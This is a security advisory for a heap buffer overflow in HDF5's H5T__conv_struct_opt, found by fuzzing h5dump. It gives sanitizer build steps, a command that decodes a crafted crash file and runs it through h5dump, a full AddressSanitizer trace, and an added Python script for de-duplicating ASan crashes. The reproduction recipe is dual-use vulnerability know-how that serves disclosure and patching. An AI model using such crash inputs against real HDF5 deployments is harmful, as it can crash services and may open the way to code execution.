
H5T__conv_struct_opt Heap Buffer Overflow

High
bmribler published GHSA-5p2m-j456-9mr2 Feb 14, 2026

Package

No package listed

Affected versions

<=1.14.1-2

Patched versions

1.14.4-2

Description

Summary

An attacker who can control an h5 file parsed by HDF5 can trigger a write-based heap buffer overflow condition. This can lead to a denial-of-service condition, and potentially further issues such as remote code execution depending on the practical exploitability of the heap overflow against modern operating systems.

Note: CVSSv3.1 scoring is based on previous heap-based buffer overflows reported in the HDF5 project. It assumes that the attacker can successfully exploit the vulnerability for remote code execution, and that the attacker coerces a target user into parsing a malicious file with h5dump. Other scenarios, such as a server-side process that parses attacker-controllable h5 files, may be exploitable without user interaction.

Details

The following write-based heap overflow was found by fuzzing the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger an out-of-bounds write in the H5T__conv_struct_opt function.

This was tested against https://support.hdfgroup.org/ftp/HDF5/releases/hdf5-1.14/hdf5-1.14.1/src/hdf5-1.14.1-2.tar.gz, built with GCC 10 and AddressSanitizer as follows:

export CFLAGS='-g -fno-omit-frame-pointer -fsanitize=address'
export CXXFLAGS='-g -fno-omit-frame-pointer -fsanitize=address'
./configure
make -j8
make install

PoC

The following PoC shows the ASAN output detailing the heap-overflow location.

$ echo "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" | base64 -d | gunzip -c > e92d6a66cceb824e3fbf9690de4dfd5d
$ ./hdf5/bin/h5dump ./e92d6a66cceb824e3fbf9690de4dfd5d
HDF5 "./e92d6a66cceb824e3fbf9690de4dfd5d" {
GROUP "/" {
   DATASET "ArrayO�Stru�" {
      DATATYPE  H5T_COMPOUND {
         32-bit big-endian integer 32-bit precision "a_name";
         24-bit little-endian floating-point 32-bit precision "b_name";
         64-bit little-endian floating-point 64-bit precision "c_name";
         H5T_COMPOUND {
            H5T_STRING {
               STRSIZE 1970974;
               STRPAD H5T_STR_NULLTERM;
               CSET H5T_CSET_ASCII;
               CTYPE H5T_C_S1;
            } "char_name";
            96-bit big-endian integer 32-bit precision "array_na";
         } "o";
      }
      DATASPACE  SCALAR
=================================================================
==968==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f1d2521ab40 at pc 0x7f1d299fc469 bp 0x7ffd71677900 sp 0x7ffd716770b0
WRITE of size 1970980 at 0x7f1d2521ab40 thread T0
    #0 0x7f1d299fc468 in __interceptor_memmove ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789
    #1 0x7f1d29557f58 in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2642
    #2 0x7f1d2952387a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #3 0x7f1d29558171 in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2586
    #4 0x7f1d2952387a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #5 0x7f1d29105b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
    #6 0x7f1d290c3221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
    #7 0x7f1d290f95d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
    #8 0x7f1d296aeee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #9 0x7f1d2967eafc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #10 0x7f1d2967eafc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #11 0x7f1d2906da0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #12 0x7f1d29075444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #13 0x556692a2546c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #14 0x556692a3a18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #15 0x5566929f3c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #16 0x5566929fc947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #17 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #18 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #19 0x7f1d29269212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #20 0x7f1d28fe3721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #21 0x7f1d28fe705e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #22 0x7f1d29277c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #23 0x7f1d292703d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #24 0x7f1d2925ad71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #25 0x7f1d29312c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #26 0x7f1d296ba455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #27 0x7f1d29691095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #28 0x7f1d29691095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #29 0x7f1d292fe61a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #30 0x7f1d292fe61a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #31 0x5566929f2be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #32 0x5566929eb1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #33 0x7f1d28c15d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
    #34 0x5566929ed649  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)

0x7f1d2521ab40 is located 0 bytes to the right of 1971008-byte region [0x7f1d25039800,0x7f1d2521ab40)
allocated by thread T0 here:
    #0 0x7f1d29a6ce8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x7f1d292162ef in H5FL__malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:237
    #2 0x7f1d292174f3 in H5FL_blk_malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:888
    #3 0x7f1d290f6fa3 in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1447
    #4 0x7f1d290f941b in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:424
    #5 0x7f1d290f941b in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:305
    #6 0x7f1d296aeee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #7 0x7f1d2967eafc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #8 0x7f1d2967eafc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #9 0x7f1d2906da0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #10 0x7f1d29075444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #11 0x556692a2546c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #12 0x556692a3a18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #13 0x5566929f3c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #14 0x5566929fc947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #15 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #16 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #17 0x7f1d29269212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #18 0x7f1d28fe3721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #19 0x7f1d28fe705e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #20 0x7f1d29277c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #21 0x7f1d292703d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #22 0x7f1d2925ad71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #23 0x7f1d29312c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #24 0x7f1d296ba455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #25 0x7f1d29691095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #26 0x7f1d29691095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #27 0x7f1d292fe61a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #28 0x7f1d292fe61a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #29 0x5566929f2be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #30 0x5566929eb1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #31 0x7f1d28c15d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
Shadow bytes around the buggy address:
  0x0fe424a3b510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe424a3b560: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
  0x0fe424a3b570: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b580: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b5a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b5b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==968==ABORTING
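
Triage of the ASan report above, as an added example (not part of the advisory or of the HDF5 project): a small Python parser that extracts the access type and size, the overflowed region, and the first non-interceptor frames, then builds an address-independent key for de-duplicating fuzzing crashes. The function name `triage` and the key format are assumptions; the sample lines are copied from the report above and trimmed.

```python
import re

# Constructed sample: lines copied from the ASan report above, stacks trimmed.
SAMPLE = """\
==968==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f1d2521ab40 at pc 0x7f1d299fc469 bp 0x7ffd71677900 sp 0x7ffd716770b0
WRITE of size 1970980 at 0x7f1d2521ab40 thread T0
    #0 0x7f1d299fc468 in __interceptor_memmove ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789
    #1 0x7f1d29557f58 in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2642
    #2 0x7f1d2952387a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449

0x7f1d2521ab40 is located 0 bytes to the right of 1971008-byte region [0x7f1d25039800,0x7f1d2521ab40)
allocated by thread T0 here:
    #0 0x7f1d29a6ce8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x7f1d292162ef in H5FL__malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:237
"""

HEADER = re.compile(r"ERROR: AddressSanitizer: (\S+) on address")
ACCESS = re.compile(r"^(READ|WRITE) of size (\d+) at")
REGION = re.compile(r"is located (\d+) bytes to the (right|left) of (\d+)-byte region")
FRAME = re.compile(r"^\s+#(\d+) 0x[0-9a-f]+ in (\S+) (\S+?):(\d+)")

def triage(report):
    """Summarise one ASan report and derive a stable de-duplication key."""
    out = {"bug": None, "access": None, "access_stack": [], "alloc_stack": []}
    stack = out["access_stack"]
    for line in report.splitlines():
        if m := HEADER.search(line):
            out["bug"] = m.group(1)
        elif m := ACCESS.match(line):
            out["access"], out["size"] = m.group(1), int(m.group(2))
        elif m := REGION.search(line):
            out["offset"], out["side"], out["region"] = int(m.group(1)), m.group(2), int(m.group(3))
        elif line.startswith("allocated by"):
            stack = out["alloc_stack"]  # frames from here on describe the allocation site
        elif m := FRAME.match(line):
            stack.append((m.group(2), m.group(3).rsplit("/", 1)[-1], int(m.group(4))))
    # Interceptor frames belong to the sanitizer runtime; skip them to find project code.
    def first_own(frames):
        return next((f for f in frames if not f[0].startswith("__interceptor_")), None)
    out["fault"] = first_own(out["access_stack"])
    out["alloc"] = first_own(out["alloc_stack"])
    # Addresses differ between runs (ASLR); function name and line number do not.
    func, _, lineno = out["fault"] or ("unknown", "", 0)
    out["key"] = "{}:{}:{}:{}".format(out["bug"], out["access"], func, lineno)
    return out
```
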

Impact

An attacker who can control an h5 file or other HDF5 data parsed by a target system can trigger the heap overflow. With the proof-of-concept above, this could result in denial-of-service conditions in server-side implementations of the HDF5 library.

Heap-based buffer overflows can result in remote code execution, depending on the specific exploitability of this vulnerability. Real-world exploitability of this issue in terms of remote-code execution is currently unknown.

Severity

High

CVSS v3 base metrics

Attack vector: Local
Attack complexity: Low
Privileges required: None
User interaction: Required
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE ID

CVE-2026-26200

Weaknesses

Heap-based Buffer Overflow

A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc().